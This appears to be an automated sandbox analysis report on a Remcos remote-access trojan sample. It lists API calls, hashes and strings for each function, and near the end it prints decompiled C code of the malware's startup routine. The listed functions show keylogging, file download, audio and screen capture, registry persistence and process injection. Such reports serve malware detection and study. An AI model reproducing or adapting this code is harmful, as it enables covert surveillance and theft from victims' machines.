Instruction ID: 7ac9442b92b71a3b95e557c57f242bac25566de69d818a97a3fadf0226cee174
Opcode Fuzzy Hash: 42e664b68ac7724ba780c5c00098682f8beb43ab86657588be60b934e4d9d7db
Instruction Fuzzy Hash: 1801D670541218BFE7105F61AC89EFF777CDB45396F1001AAF805A3281D6748F019674

Uniqueness

Uniqueness Score: -1.00%

Function 00417678, Relevance: 6.0, APIs: 4, Instructions: 37COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 0041768D
GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 004176AF
CloseHandle.KERNEL32(00000000), ref: 004176BA
CloseHandle.KERNEL32(00000000), ref: 004176C2

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle$FileModuleNameOpenProcess
String ID:
API String ID: 3706008839-0
Opcode ID: 26b55f5a258af6edc2e09f8168abb4a95287f2a40d9827df7da255adfb7933c9
Instruction ID: f8a04bcb30d388e69ca110f6c0d2bfbdbb8b62fcd9983a5c8f5887249ce98a8e
Opcode Fuzzy Hash: 26b55f5a258af6edc2e09f8168abb4a95287f2a40d9827df7da255adfb7933c9
Instruction Fuzzy Hash: 44F0E9312447156BD6205A585C09FAB367C8784B93F100177F908D5292EEA4D94246AE

Uniqueness

Uniqueness Score: -1.00%

Function 0041459C, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 249COMMON

Download Yara Rule

APIs

Part of subcall function 00414906: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00414921
Part of subcall function 00414906: CreateCompatibleDC.GDI32(00000000), ref: 0041492D

SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00414646
SHCreateMemStream.SHLWAPI(00000000), ref: 0041469C

Part of subcall function 00404E0B: closesocket.WS2_32(?), ref: 00404E11

Strings

image/jpeg, xrefs: 00414660

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Create$Stream$Compatibleclosesocket
String ID: image/jpeg
API String ID: 3038386933-3785015651
Opcode ID: 7315358cf922668f4651b714644d925457dbc072c3605097084afc0af15d831a
Instruction ID: 76b108af669c3063bc8327b28f0eeeb389dcf0988f89de8eeeeaadbda1c1d6eb
Opcode Fuzzy Hash: 7315358cf922668f4651b714644d925457dbc072c3605097084afc0af15d831a
Instruction Fuzzy Hash: F8816D716083419BC324FB25C985AEFB3A4AFC5318F00493FB5969B1D1EF785945CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00447399, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00446F6C: GetOEMCP.KERNEL32(00000000,?,?,004471F5,?), ref: 00446F97

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044723A,?,00000000), ref: 0044740D
GetCPInfo.KERNEL32(00000000,:rD,?,?,?,0044723A,?,00000000), ref: 00447420

Strings

:rD, xrefs: 0044741B, 0044741E

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID: :rD
API String ID: 546120528-3120900009
Opcode ID: e7dd486a7158d532bde09d9e7db95788a91d24dc14596c43e70085922fabfaec
Instruction ID: 614f5d5ef064064d7ec38ea7b35d3f5f756231f868e2d753d05d5f6cbb9767d4
Opcode Fuzzy Hash: e7dd486a7158d532bde09d9e7db95788a91d24dc14596c43e70085922fabfaec
Instruction Fuzzy Hash: 65513370A086059EFB20CF35C8816BBBFA5EF41304F14406FD0868B251E73D9947CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00447044, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 00447069

Strings

, xrefs: 004470AE
vuD, xrefs: 0044705B

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Info
String ID: $vuD
API String ID: 1807457897-1530330280
Opcode ID: 3f1def9f96a58cc15d1bbc526656efa8d46c329ab04edfec503587d68abf9c7b
Instruction ID: 92fcf1547ebdf66eb0b87621d9a8ff62090b57e6ee7fe94dbbcc2872a12e2c7f
Opcode Fuzzy Hash: 3f1def9f96a58cc15d1bbc526656efa8d46c329ab04edfec503587d68abf9c7b
Instruction Fuzzy Hash: 9641F9705082489FEF258E64CC84BF7BBB9DB55308F2404EEE58A87242D3399E46DF65

Uniqueness

Uniqueness Score: -1.00%

Function 0040414D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404167

Part of subcall function 00417093: GetCurrentProcessId.KERNEL32(00000000,7519FBB0,00000000,?,?,?,?,?,0040AEF2,.vbs), ref: 004170BA

Part of subcall function 0041432B: CloseHandle.KERNEL32(004041F6,?,004041F6,0045F464), ref: 00414341
Part of subcall function 0041432B: CloseHandle.KERNEL32(0045F464,?,004041F6,0045F464), ref: 0041434A

Part of subcall function 004179DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,00408D8E), ref: 004179F9

Sleep.KERNEL32(000000FA,0045F464), ref: 00404239

Strings

/sort "Visit Time" /stext ", xrefs: 004041B3

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
String ID: /sort "Visit Time" /stext "
API String ID: 368326130-1573945896
Opcode ID: 838bfadf3c773ccde502162025eda6582f82c7a68597142ee57ed8fd5ffc62d1
Instruction ID: 7061a5f3a0732a34bedf69b2f97f4882e16be89ee39d0e7819724232ed9fbdaa
Opcode Fuzzy Hash: 838bfadf3c773ccde502162025eda6582f82c7a68597142ee57ed8fd5ffc62d1
Instruction Fuzzy Hash: CB316371A102185BCB14FAB5DC969EE77769F90308F40007FB906775E2EF38194ACA99

Uniqueness

Uniqueness Score: -1.00%

Function 00412A86, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60sleepfilenetworkCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 00412A88
URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 00412AEA

Strings

8E@, xrefs: 004133C4

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: DownloadFileSleep
String ID: 8E@
API String ID: 1931167962-787191786
Opcode ID: 3410a5c9f82c25c8ba3a4d0fdb73f71bcee90e7852e91e14cb60bb03a2b14178
Instruction ID: 026e37eaac6a7f0be5a6f47ff2f6c220693f67fdfc1424ac955b23e6f862d316
Opcode Fuzzy Hash: 3410a5c9f82c25c8ba3a4d0fdb73f71bcee90e7852e91e14cb60bb03a2b14178
Instruction Fuzzy Hash: 661186715043015BD614FF72D8569BF7399AF54309F00083FF946A61E2EF389948C65A

Uniqueness

Uniqueness Score: -1.00%

Function 004095A9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

UnhookWindowsHookEx.USER32(?), ref: 0040961F

Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED

Strings

Offline Keylogger Stopped, xrefs: 004095C0, 004095C7, 004095F1
[Info], xrefs: 004095FC

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: EventHookLocalTimeUnhookWindowswsprintf
String ID: Offline Keylogger Stopped$[Info]
API String ID: 2949427887-1791908007
Opcode ID: 76b4e74cdbfe3951a4c34c3bf6368e8ba512a57fb1dd38bf9228c53cbfd85d85
Instruction ID: 9efaed4a8ef81a290ad5d268e4fe3922035fbc03e5cccf55ce25ae16395c1a9d
Opcode Fuzzy Hash: 76b4e74cdbfe3951a4c34c3bf6368e8ba512a57fb1dd38bf9228c53cbfd85d85
Instruction Fuzzy Hash: 0D01B531A0460157DB297729D80B7BE7BA54B42305F44057FD981222D3EABE0D5AC7DF

Uniqueness

Uniqueness Score: -1.00%

Function 004425B3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

IsValidLocale.KERNEL32(00000000,?C,00000000,00000001,?,?,0043E33F,?,?,0043DD1F,?,00000004), ref: 004425FF

Strings

IsValidLocaleName, xrefs: 004425C4, 004425CE
?C, xrefs: 004425F6, 004425E3

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: LocaleValid
String ID: ?C$IsValidLocaleName
API String ID: 1901932003-3626571907
Opcode ID: d1d8c5253a1af981cfd3e37de039cb3b4bc27b4a035ec99b902d66c65b304dd4
Instruction ID: 0f43182f0e06842afc615407eccca0477f3e303412cdda621fdba0a01c3862c5
Opcode Fuzzy Hash: d1d8c5253a1af981cfd3e37de039cb3b4bc27b4a035ec99b902d66c65b304dd4
Instruction Fuzzy Hash: 92F05230680718B7DB216F209C02FAEBB64DB04B52F90402BFC016B2C2DEBD5E05958D

Uniqueness

Uniqueness Score: -1.00%

Function 00412777, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00412795

Strings

8E@, xrefs: 004133C4
open, xrefs: 0041278F

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExecuteShell
String ID: 8E@$open
API String ID: 587946157-2601783919
Opcode ID: 4a174233fad1308712026915405e2748d4c3bbd23a7c6193313af7554f161b63
Instruction ID: a3a45966c527cb9039505bdf36bed85c4dc8a7f97c1c46fe52c99c9ff6feb995
Opcode Fuzzy Hash: 4a174233fad1308712026915405e2748d4c3bbd23a7c6193313af7554f161b63
Instruction Fuzzy Hash: 86E092712083445BD204FA72DC81EBFB398AB50309F00083FB906A10E2EF385D0C866A

Uniqueness

Uniqueness Score: -1.00%

Function 004129DA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

waveInStop.WINMM ref: 004129E6
waveInClose.WINMM ref: 004129F2

Strings

8E@, xrefs: 004133C4

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: wave$CloseStop
String ID: 8E@
API String ID: 3638528417-787191786
Opcode ID: 1d3af16e672de4a25f439eee544860deda97f69f123fda986720eb11b6d204bc
Instruction ID: 5a6495d9c5bf32114adb3f6aa644e01b82198ca3e6267900558c7952ddd75583
Opcode Fuzzy Hash: 1d3af16e672de4a25f439eee544860deda97f69f123fda986720eb11b6d204bc
Instruction Fuzzy Hash: CAE04F311182818BC311EF65E80569DB790FB51306F40053EE455D10F2EF354599DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040F4FE, Relevance: 5.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000014,00000001,00000000,?,?,?,?,0040F89B), ref: 0040F52C
IsBadReadPtr.KERNEL32(?,00000014,?,0040F89B), ref: 0040F5FE
SetLastError.KERNEL32(0000007F), ref: 0040F619
SetLastError.KERNEL32(0000007E,?,0040F89B), ref: 0040F632

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: c7e9688620f9bae9d1880f1a6b981ae3ed74a0f78203f15c523f219ad1b5e301
Instruction ID: 276675e80245dda8867d672efd476c996cb1fc0ae7fab6a88f5e1639ff5a30e1
Opcode Fuzzy Hash: c7e9688620f9bae9d1880f1a6b981ae3ed74a0f78203f15c523f219ad1b5e301
Instruction Fuzzy Hash: B3419B71A00204EFDB24CF58CC44B6AB7F5FF44711F14887AE446A7A91E739E906DB18

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Kkjczlm.exe PID: 6396 Parent PID: 3472 Kkjczlm.exeCOMMON

Executed Functions

Non-executed Functions

Function 032F4D2C, Relevance: 5.1, Strings: 4, Instructions: 129COMMON

Download Yara Rule

Strings

p.@, xrefs: 032F4D85
l.@, xrefs: 032F4E63
p.@, xrefs: 032F4EAB
3C, xrefs: 032F4E79

Memory Dump Source

Source File: 00000013.00000003.337217463.00000000032F4000.00000004.00000001.sdmp, Offset: 032F4000, based on PE: false

Similarity

API ID:
String ID: l.@$p.@$p.@$3C
API String ID: 0-542283486
Opcode ID: c8a749997cf1c26def18ea4b0fc89dc5befe63049a7e31b985774c4fe61c331a
Instruction ID: 125b0982d3aaaf484d858b6d10e26b0829a473ec50c17be4bca8e5260f302a1c
Opcode Fuzzy Hash: c8a749997cf1c26def18ea4b0fc89dc5befe63049a7e31b985774c4fe61c331a
Instruction Fuzzy Hash: 2A415D34530701AEE731FE26C908B23F5E9AB00758F248A3ED3A69A6D4D7F599C48784

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mobsync.exe PID: 6232 Parent PID: 6396 mobsync.exeCOMMON

Executed Functions

Function 0077CB4E, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0077CB4E(int _a4) {
				void* _t14;
				void* _t16;

				if(E00782796(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E0077CB8F(_t14, _t16, _a4);
				ExitProcess(_a4);
			}

0x0077cb5a
0x0077cb76
0x0077cb76
0x0077cb7f
0x0077cb88

APIs

GetCurrentProcess.KERNEL32(0000000C,?,0077CB24,0000000C,007A8188,0000000C), ref: 0077CB6F
TerminateProcess.KERNEL32(00000000,?,0077CB24,0000000C,007A8188,0000000C), ref: 0077CB76
ExitProcess.KERNEL32 ref: 0077CB88

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: daa8266da29ad34c27db5c9b5c13f1376e6b0264d055451eae2712f3d3d8aea8
Instruction ID: 201212f0dc0185926cac4ef542be5f865b6afe8a80ea989f1279d8b30bebbee5
Opcode Fuzzy Hash: daa8266da29ad34c27db5c9b5c13f1376e6b0264d055451eae2712f3d3d8aea8
Instruction Fuzzy Hash: 47E0B671000608ABCF126F68DD0AA593F69FB59392F14801DF9098A132CB3DEE43CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0076F8B9, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0076F8B9() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0076F8C5); // executed
				return _t1;
			}

0x0076f8be
0x0076f8c4

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_0002F8C5,0076F5A8), ref: 0076F8BE

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8f72ad73882f68e00707b50653184924bec6c9eb0aab48caf9be3afe3253ddb8
Instruction ID: d4bcdce3f53269cd6d2df4fbe5de15e5b2fb9d40db0717095d7f760ee6f355ea
Opcode Fuzzy Hash: 8f72ad73882f68e00707b50653184924bec6c9eb0aab48caf9be3afe3253ddb8
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0074C2BE, Relevance: 55.0, APIs: 15, Strings: 16, Instructions: 774
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0074C2BE(void* __edx, void* __eflags, intOrPtr _a4, char* _a12) {
				char _v524;
				char _v700;
				char _v720;
				char _v724;
				char _v728;
				char _v744;
				char _v756;
				char _v760;
				char _v772;
				struct _SECURITY_ATTRIBUTES* _v776;
				signed int _v780;
				char _v784;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t71;
				void* _t78;
				void** _t86;
				void* _t90;
				CHAR* _t93;
				long _t95;
				int _t97;
				char _t100;
				void* _t101;
				void* _t105;
				void* _t121;
				void* _t122;
				void* _t129;
				char _t135;
				char* _t137;
				signed char* _t139;
				signed char* _t141;
				void* _t144;
				void* _t146;
				void* _t163;
				intOrPtr _t165;
				void* _t166;
				intOrPtr _t182;
				intOrPtr* _t185;
				void* _t187;
				void* _t193;
				char* _t196;
				void* _t199;
				char* _t203;
				void* _t210;
				signed short* _t214;
				void* _t215;
				void* _t216;
				signed int _t217;
				CHAR* _t224;
				void* _t226;
				char* _t229;
				char* _t231;
				intOrPtr* _t233;
				void* _t235;
				intOrPtr* _t240;
				intOrPtr* _t244;
				void* _t246;
				void* _t254;
				void* _t265;
				void* _t268;
				struct _SECURITY_ATTRIBUTES* _t269;
				int _t272;
				char* _t360;
				signed int _t382;
				signed int _t386;
				int _t388;
				signed int _t394;
				signed int _t397;
				intOrPtr _t423;
				void* _t433;
				void* _t435;
				signed int _t452;
				void* _t455;
				char* _t461;
				void* _t462;
				char* _t465;
				void* _t467;
				void* _t472;
				char* _t477;
				intOrPtr* _t481;
				void* _t484;
				void* _t485;
				void* _t486;
				signed int _t492;
				void* _t495;
				void* _t496;
				void* _t497;
				void* _t499;
				void* _t501;
				void* _t502;
				void* _t506;

				_t444 = __edx;
				 *0x7abd28 = _a4;
				_push(_t268);
				E0074CC55( &_v724, __edx, __eflags);
				_t495 = (_t492 & 0xfffffff8) - 0x2f4;
				E007420EC(_t268, _t495, __edx, __eflags, 0x7ac59c);
				_t496 = _t495 - 0x18;
				E007420EC(_t268, _t496, __edx, __eflags,  &_v728);
				_t71 = E00757478( &_v756, __edx);
				_t497 = _t496 + 0x30;
				E0074D458(__edx, _t71);
				E00741E74( &_v760, __edx);
				_t284 = _a12;
				if( *_a12 != 0x2d) {
					L6:
					_t461 = 0x7ac578;
					__eflags =  *((char*)(E00741F95(E00741E49(0x7ac578, _t444, __eflags, 3))));
					 *0x7abb01 = __eflags != 0;
					_t78 = E00745343(_t268,  &_v756, E007475E6( &_v780, "Software\\", __eflags, E00741E49(0x7ac578, _t444, __eflags, 0xe)), 0x7ac578, __eflags, "\\");
					_t471 = 0x7ac518;
					E00741FD1(0x7ac518, _t77, 0x7ac518, _t78);
					E00741FC7();
					E00741FC7();
					E00745A0B(_t268, 0x7ac5cc, "Exe");
					_t269 = 0;
					E00741E49(0x7ac578, _t77, __eflags, 0x32);
					__eflags =  *(E00745220(0));
					 *0x7abd4e = __eflags != 0;
					E00741E49(0x7ac578, _t77, __eflags, 0x33);
					_t86 = E00745220(0);
					__eflags =  *_t86;
					 *0x7abd4f =  *_t86 != 0;
					__eflags =  *0x7abd4e - _t269; // 0x0
					if(__eflags == 0) {
						L8:
						_v776 = _t269;
						_t472 = OpenMutexA(0x100000, _t269, "Remcos_Mutex_Inj");
						__eflags = _t472;
						if(_t472 != 0) {
							WaitForSingleObject(_t472, 0xea60);
							CloseHandle(_t472);
						}
						_t447 = E00741F95(0x7ac518); // executed
						_t90 = E00750885(_t89, "Inj",  &_v776); // executed
						__eflags = _t90;
						if(__eflags != 0) {
							_t447 = E00741F95(0x7ac518);
							E00750CE2(_t259, __eflags, "Inj");
						}
						E00741FAD(0x7ac548, E00741E49(_t461, _t447, __eflags, 0xe));
						_t93 = E00741F95(0x7ac548);
						_t462 = 0;
						_t272 = 1;
						CreateMutexA(0, 1, _t93); // executed
						_t95 = GetLastError();
						__eflags = _t95 - 0xb7;
						if(_t95 == 0xb7) {
							L45:
							E00741FC7();
							_t97 = _t272;
							goto L5;
						} else {
							E0074CD09();
							GetModuleFileNameW(0, 0x7abb08, 0x104);
							_t100 = E00757614(0x7ac548);
							_push(0x7ac548);
							_t448 = 0x80000002;
							 *0x7abeb4 = _t100;
							_t101 = E007508E2( &_v772, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName");
							_t499 = _t497 + 0xc;
							E00741FD1(0x7ac5b4, 0x80000002, 0x7ac5b4, _t101);
							E00741FC7();
							__eflags =  *0x7abeb4;
							if( *0x7abeb4 == 0) {
								_push(" (32 bit)");
							} else {
								_push(" (64 bit)");
							}
							E00745A02(_t272, 0x7ac5b4, _t462);
							_t105 =  *0x7abd20; // 0x0
							__eflags = _t105;
							if(_t105 != 0) {
								 *0x7aa9d0 =  *_t105();
							}
							_t477 = 0x7ac578;
							__eflags = _v776 - _t462;
							if(__eflags == 0) {
								_t433 = E00741E49(0x7ac578, _t448, __eflags, 0x2e);
								__eflags =  *((char*)(E00741F95(_t433)));
								if(__eflags != 0) {
									__eflags =  *0x7abd20 - _t462; // 0x0
									if(__eflags != 0) {
										__eflags =  *0x7aa9d0 - _t462; // 0x2
										if(__eflags == 0) {
											_t448 = E00741F95(0x7ac518);
											_t254 = E0075083B(0x7ac518, _t253, "origmsc");
											_pop(_t435);
											__eflags = _t254;
											if(__eflags == 0) {
												E00745F77(_t272, _t435, _t448);
											}
										} else {
											_push(_t433);
											_push(_t433);
											__eflags = E0074A713() - 0xffffffff;
											if(__eflags == 0) {
												E00746071(__eflags);
											}
										}
									}
								}
							}
							__eflags =  *((char*)(E00741F95(E00741E49(_t477, _t448, __eflags, 0x27))));
							if(__eflags != 0) {
								E0074D3F7();
							}
							E00749DC9(_t272, 0x7ac4e8, E00741F95(E00741E49(_t477, _t448, __eflags, 0xb)));
							__eflags =  *((char*)(E00741F95(E00741E49(_t477, _t448, __eflags, 4))));
							 *0x7abb02 = __eflags != 0;
							__eflags =  *((char*)(E00741F95(E00741E49(_t477, _t448, __eflags, 5))));
							 *0x7abafb = __eflags != 0;
							__eflags =  *((char*)(E00741F95(E00741E49(_t477, _t448, __eflags, 8))));
							 *0x7abb00 = __eflags != 0;
							__eflags =  *((char*)(E00741F95(E00741E49(_t477, _t448, __eflags, 3))));
							if(__eflags != 0) {
								_t240 = E00741F95(E00741E49(_t477, _t448, __eflags, 0x30));
								_t25 = _t240 + 2; // 0x2
								_t448 = _t25;
								do {
									_t423 =  *_t240;
									_t240 = _t240 + 2;
									__eflags = _t423 - _t462;
								} while (_t423 != _t462);
								__eflags = _t240 - _t448;
								if(__eflags != 0) {
									_t244 = E00741F95(E00741E49(_t477, _t448, __eflags, 9));
									_t246 = E00741F95(E00741E49(0x7ac578, _t448, __eflags, 0x30));
									_t448 =  *_t244;
									E00741EFA(0x7ac530,  *_t244, _t244, E0075805B( &_v780,  *_t244, _t246));
									E00741EF0();
									_t477 = 0x7ac578;
								}
							}
							__eflags = _v776 - _t462;
							if(_v776 != _t462) {
								E00771F00(_t462,  &_v524, _t462, 0x208);
								_t121 = E00742489();
								_t122 = E00741F95(0x7ac560);
								_t449 = E00741F95(0x7ac518);
								E00750A30(_t124, "exepath",  &_v524, 0x208, _t122, _t121);
								_t501 = _t499 + 0x20;
								E00749DC9(_t272, 0x7ac500,  &_v524);
								_t465 = 0x7ac578;
								goto L47;
							} else {
								__eflags =  *0x7abb01;
								if(__eflags == 0) {
									E00749DC9(_t272, 0x7ac500, 0x7abb08);
								} else {
									_t229 = E00741F95(E00741E49(_t477, _t448, __eflags, 0x1e));
									_t231 = E00741F95(E00741E49(_t477, _t448, __eflags, 0xc));
									_t233 = E00741F95(E00741E49(0x7ac578, _t448, __eflags, 9));
									__eflags =  *_t229;
									__eflags =  *_t231;
									_t477 = 0x7ac578;
									_t235 = E00741F95(E00741E49(0x7ac578, _t448,  *_t231, 0xa));
									E0074A987( *_t233, E00741F95(E00741E49(0x7ac578, _t448, __eflags, 0x30)), _t235, ((_t232 & 0xffffff00 |  *_t229 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff, (_t232 & 0xffffff00 |  *_t229 != 0x00000000) & 0x000000ff);
									_t499 = _t499 + 0xc;
									_t272 = 1;
									_t462 = 0;
								}
								_t210 = E00742489();
								_t452 = 2;
								_t394 =  ~(0 | __eflags > 0x00000000) | (_t210 + 0x00000001) * _t452;
								_push(_t394);
								_v780 = _t394;
								_t486 = E0076F4C6(_t394, (_t210 + 1) * _t452 >> 0x20, _t477, __eflags);
								__eflags = _t486;
								if(_t486 == 0) {
									_t486 = _t462;
								} else {
									E00771F00(_t462, _t486, _t462, _v780);
									_t499 = _t499 + 0xc;
								}
								_t214 = E00741EEB(0x7ac500);
								_t455 = _t486 - _t214;
								__eflags = _t455;
								_t467 = 2;
								do {
									_t397 =  *_t214 & 0x0000ffff;
									 *(_t214 + _t455) = _t397;
									_t214 = _t214 + _t467;
									__eflags = _t397;
								} while (_t397 != 0);
								_push(_t397);
								_t215 = E00742489();
								_t216 = E00741F95(0x7ac560);
								_t217 = E00742489();
								E00750C80(E00741F95(0x7ac518), __eflags, "exepath", _t486, 2 + _t217 * 2, _t216, _t215);
								E0076F4CF(_t486);
								_t501 = _t499 + 0x1c;
								_t465 = 0x7ac578;
								E00741E49(0x7ac578, _t219, __eflags, 0xd);
								_t449 = "0";
								__eflags = E0074EAD9(__eflags);
								if(__eflags == 0) {
									L47:
									_push(_t272);
									_t129 = E00741F95(E00741E49(_t465, _t449, __eflags, 0x34));
									_t502 = _t501 - 0x18;
									E00742084(_t272, _t502, _t129);
									_push("licence");
									_t450 = E00741F95(0x7ac518);
									E00750AA7(0x7ac518, _t131);
									_t497 = _t502 + 0x20;
									_t135 = E00776769(_t133, E00741F95(E00741E49(_t465, _t131, __eflags, 0x28)));
									 *0x7abb03 = _t135;
									__eflags = _t135 - 2;
									if(_t135 != 2) {
										__eflags = _t135 - _t272;
										if(__eflags == 0) {
											_t388 = 0;
											__eflags = 0;
											goto L51;
										}
									} else {
										_t388 = _t272;
										L51:
										E00758F59(_t272, _t388, _t450);
										__eflags = 0;
										CreateThread(0, 0, E00758D28, 0, 0, 0);
									}
									_t137 = E00741F95(E00741E49(_t465, _t450, __eflags, 0x37));
									_t139 = E00741F95(E00741E49(_t465, _t450, __eflags, 0x10));
									_t141 = E00741F95(E00741E49(_t465, _t450, __eflags, 0xf));
									__eflags =  *_t137;
									_t471 = 0x7ac578;
									_t144 = E00776769(_t142, E00741F95(E00741E49(0x7ac578, _t450,  *_t137, 0x36)));
									_t146 = E00741F95(E00741E49(0x7ac578, _t450, __eflags, 0x11));
									E0074846D(_t139,  *_t141 & 0x000000ff,  *_t139 & 0x000000ff, E00741F95(E00741E49(0x7ac578, _t450, __eflags, 0x31)), _t146, _t144, (_t140 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff);
									__eflags =  *((intOrPtr*)(E00741F95(E00741E49(0x7ac578, _t450, __eflags, 0x14)))) - 1;
									if(__eflags != 0) {
										_t461 = CreateThread;
									} else {
										_t199 = 2;
										_t485 = E0076F218(_t450, 0x7ac578, __eflags, _t199);
										 *_t485 = 0;
										_t386 = E00741E49(0x7ac578, _t450, __eflags, 0x35);
										_t203 = E00741F95(_t386);
										_t461 = CreateThread;
										__eflags =  *_t203;
										 *((char*)(_t485 + 1)) = _t386 & 0xffffff00 | __eflags != 0x00000000;
										CreateThread(0, 0, E00755938, _t485, 0, 0);
										_t471 = 0x7ac578;
									}
									__eflags =  *((intOrPtr*)(E00741F95(E00741E49(_t471, _t450, __eflags, 0x16)))) - 1;
									if(__eflags == 0) {
										_t193 = 2;
										_t484 = E0076F218(_t450, _t471, __eflags, _t193);
										 *_t484 = 1;
										_t382 = E00741E49(0x7ac578, _t450, __eflags, 0x35);
										_t196 = E00741F95(_t382);
										__eflags =  *_t196;
										__eflags = 0;
										 *((char*)(_t484 + 1)) = _t382 & 0xffffff00 |  *_t196 != 0x00000000;
										CreateThread(0, 0, E00755938, _t484, 0, 0);
										_t471 = 0x7ac578;
									}
